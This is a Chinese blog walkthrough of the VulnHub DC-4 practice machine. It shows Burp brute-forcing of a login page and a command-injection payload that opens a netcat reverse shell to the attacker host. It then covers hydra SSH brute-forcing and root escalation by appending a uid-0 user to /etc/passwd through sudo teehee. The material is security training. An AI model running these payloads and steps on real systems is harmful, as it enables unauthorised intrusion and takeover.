DC-4靶机渗透测试详细教程

最新推荐文章于 2024-08-02 09:09:50 发布
最新推荐文章于 2024-08-02 09:09:50 发布
阅读量3.9k 收藏 23
点赞数 3
分类专栏: VulnHub靶场通关教程 文章标签: 渗透测试 DC-4靶机 kali linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34028816/article/details/124572607
版权

DC-4

DC-4下载:https://download.vulnhub.com/dc/DC-4.zip.torrent

攻击者kali:192.168.1.9

受害者DC-4:192.168.1.15

使用arp-scan -l获取到DC-4靶机IP地址

使用nmap扫描DC-4

nmap -sS -A 192.168.1.15

发现了22端口和80端口,web服务使用的是nginx/1.15.10版本

打开网页看看

需要账号登录,估计是admin账号

方法一:直接打开burp来进行抓包获取密码

因为没有字典,所以复制kali的/usr/share/john下的password.lst到桌面

cd  /usr/share/john

cp password.lst /root/桌面/

接下来使用burp来获取密码

发送到测试器

因为猜测账号是admim所以就只使用Sniper来进行获取密码

有效载荷选运行时文件,然后选着文件,选到刚刚kali复制出来的密码字典,点击开始攻击

过了大概一分钟获取到密码为 happy

点击长哪里,显示最长的就是密码,可以尝试登录

登录成功

点击进Command,有个run,点击一下发现执行了命令

使用burp来抓包

发现执行的命令等于Run按钮,将数据发送到重发器(Repeater)

然后在重发器点击响应

得到数据

那这样子我们试试修改一下他的命令,然后把数据发动回去

radio=nc+192.168.1.9+4444+-e+/bin/bash&submit=Run

kali开启监听,获取到信息

反弹交互shell

python -c 'import pty;pty.spawn("/bin/sh")'

尝试进入到home目录,看到三个三件夹,应该是三个用户

当我进入到jim的目录下的时候发现backups的文件夹下面有个old-passwords.bak的文件,查看发现好像是密码字典

将内容复制到1的文本里

既然有了这个密码字典,那拿来试试能不能爆出jim的密码

使用hydra来爆

hydra -l jim -P 1 -t 10 ssh://192.168.1.15

hydra -l jim -P 1 192.168.1.15 ssh

得到jim的密码 jibril04

ssh jim@192.168.1.15  

登录后提示有一封邮箱

查看邮箱

Charles是之前在home里看到的其中一个,并且还给了密码,可以尝试切换用户

成功登录charles

尝试提权

提示teehee具有root权限

使用teeheem命令创建一个用户uid=0的

sudo teehee -a /etc/passwd

demon::0:0:::/bin/bash

拿到root权限

拿到flag

DC-4总结

使用kali的字典爆破  /usr/share/john下的password.lst

burp抓包,并且爆破到admin账号的密码

burp修改数据包发送到靶机,kali监听到获取shell反弹

radio=nc+192.168.1.9+4444+-e+/bin/bash&submit=Run

python -c 'import pty;pty.spawn("/bin/sh")'   shell交互的使用

hydra密码爆破

teeheem命令提权

sudo teehee -a /etc/passwd

demon::0:0:::/bin/bash

啊醒
关注
专栏目录
DC-4靶机渗透详细教程(附靶机链接)
bwt_D的博客
03-01 5931
靶机链接:https://pan.baidu.com/s/1Bcy6_fOXj4ysZTcBIUOxpw 提取码:eefe 首先查看kali虚拟机的ip地址 ifconfig 可以看到我们kali的虚拟机ip为192.168.159.145 接着使用nmap工具进行扫描,获取靶机的IP地址 nmap -sP 192.168.159.2/24 打开靶机的虚拟机设置,选择网络适配器-高级,查看我们靶机的mac地址。与扫描的结果匹配,发现靶机的IP为192.168.159.142 继续使用namp对靶
【靶场实战】dc-1靶机 渗透测试
weixin_44023442的博客
04-05 1206
参考文章 DC-1 靶机安装及练习 一、搭建环境 搭建环境 下载地址:dc-1 加压后用VMware打开,配置网络适配器为NAT模式 注意:dc-1开机后会提示输入账号密码,这里可以不用管他。 开启kali虚拟机,同样的,配置网络适配器为NAT模式 测试环境 在kali终端输入:ifconfig,查看当前网段 可知,当前c段是 192.168.224.0 用nmap扫描整个c段,输入nmap -sP 192.168.224.0/24 很明显,192.168.224.129 就是dc-1的ip地址
DC-4靶机渗透
weixin_45349299的博客
12-21 1050
开放的端口:22 => ssh服务 ---- OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)80 => http服务 ---- nginx 1.15.10扫描出来的网站目录。
DC系列靶场---DC 4靶场的渗透测试
最新发布
zhouA0221的博客
08-02 736
可以看到使用teehee提权,teehee就是tee的变体从标准输入读取并写入标准输出和文件我们可以借助teehee往passwd写入一个root账号即可得到root权限查看一下这个命令的帮助手册,使用-a参数在/etc/passwd文件里面新建一个有管理员权限的用户。因为我使用的字典文件很大,我们这时候可以根据长度来分辨哪个是密码,因为正确密码只有一个,我们可以点length来区分真密码,我们看到密码是happy。4、在做提权没有思路的时候,我们还是要进行信息收集,通过信息收集获得更多提权的方式。
DC系列(4)DC-4靶机渗透
Nikris的博客
01-11 946
DC-4
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub-DC-1靶机渗透测试和相应的知识点总结
qq_45584159的博客
12-15 1410
文章目录前言一、探测目标主机的ip1.使用arp-scan -l 命令,来探测同一局域网内的存活主机。2.使用netdiscover -i eth0二、使用namp扫描目标主机的开放端口,并通过开放端口得到更多的信息三. .Metasploit漏洞利用msf的简单使用:术语:模块:基础指令:模块使用规则:msf中大多数命令:第一步.启动msf:第二步.搜索drupal可利用的漏洞第三步,采用最新的2018漏洞尝试攻击,配置参数第四步,反弹shell四. 进入数据库第一步.进入数据库 前言 这是我第一次使用
DC-1靶机渗透测试
weixin_45537612的博客
01-13 572
前奏:联网 自己刚安装的kali竟然没网,在花费了不少时间团团转后,用了下面的方法得以解决 出处: kali2020 永久性网络配置 (1)在VMware里打开kali linuxDC-1靶机 (2)打开终端通过su切换到root用户 (3)用ip add查看kali ip:192.168.153.129 (4)运用nmap扫描192.168.153.0/24以获取靶机IP 扫描出靶机 IP:192.168.153.130 用nmap -sV -p- 192.168.153.130扫描开放的端口
DC-4靶机渗透测试
qq_60463414的博客
07-07 2546
DC4靶机shell反弹,提权流程。
DC-4靶机实战 渗透测试
她叫常玉莹
07-23 427
使用arp-scan查看主机 arp-scan -l 靶机ip地址为192.168.0.151,使用nmap进行扫描 目标机开放了80端口与22端口,使用浏览器访问下80端口 页面是一个表单,抓下包看一下 使用jhon的字典进行爆破 密码为happy登陆一下。 点击command可以运行命令,bp抓下数据包分析下 命令是由radio参数传入的,并且使用“+”代替“ ”(空格)。发送到repeater模块修改radio参数测试一下。 可以看到命令成功执行了,说明这里存在命令注入漏洞。在/home
DC4靶机渗透测试
Huangshanyoumu的博客
04-16 687
文章目录环境版本:一、信息收集1.主机发现2.端口扫描二、漏洞挖掘1.访问目标 ip,查看内容2.使用 BP 进行爆破密码3.使用密码登陆4.使用 BP 查看执行命令流量包5.替换命令来使用 nc 建立连接7.使用 nc 将靶机文件传输到攻击机8.使用 hydra 爆破 ssh 密码9.ssh 登陆,进行信息收集10.提权 描述:从靶机DC-3开始,只有一个入口和一个最终的flag, 只有拿到root权限才可以发现最终的flag,DC-4也是一样 环境版本: VMware pro 16 Kali 202
DC靶机渗透-DC4
weixin_41607190的博客
12-20 1782
设置成nat模式 发现主机 arp-scan -l #对局域网内的每个主机发送arp包,存在主机就会返回arp响应 端口扫描,看开启了哪些服务(端口对应服务)
dc-4 靶机渗透学习
..
03-19 3144
信息收集 第一步还是老办法,探测主机存活。 nmap -sP 192.168.202.0/24 通过推断得出192.168.202.142是靶机,具体请看dc-2、dc-3,对靶机进行端口扫描。 nmap -A -p- -v 192.168.202.142 发现22、80端口开启,访问一下80端口,发现是个登录页面。 用Wappalyzer识别框架,没试别出,查看源代码发现只是一个简单的登录界面 这种情况感觉没必要再用nikto扫描了,尝试用bp爆...
DC-4靶场搭建及渗透实战详细过程(DC靶场系列)
金 帛的博客
07-28 5206
dc-4靶场详细渗透过程
DC-4靶机渗透指南(渗透测试详细操作)
jrdh的博客
12-06 5049
DC-4 靶机渗透测试,帮助读者了解DC系列的具体考察内容
【渗透项目】靶机DC-4渗透过程
命运的旋律的博客
04-12 383
信息收集 主机发现 nmap -sn 192.168.72.0/24 端口扫描 nmap -sV -T4 -O -sT -Pn -p- 192.168.72.156 --script vuln 访问80端口,是一个登陆界面,页面如下 目录扫描 dirbuster 没有发现其他有价值的目录 漏洞利用 通过对登陆页面的测试,发现该页面缺少防暴力破解的验证机制 通过页面上的提示,尝试...
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

啊醒

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值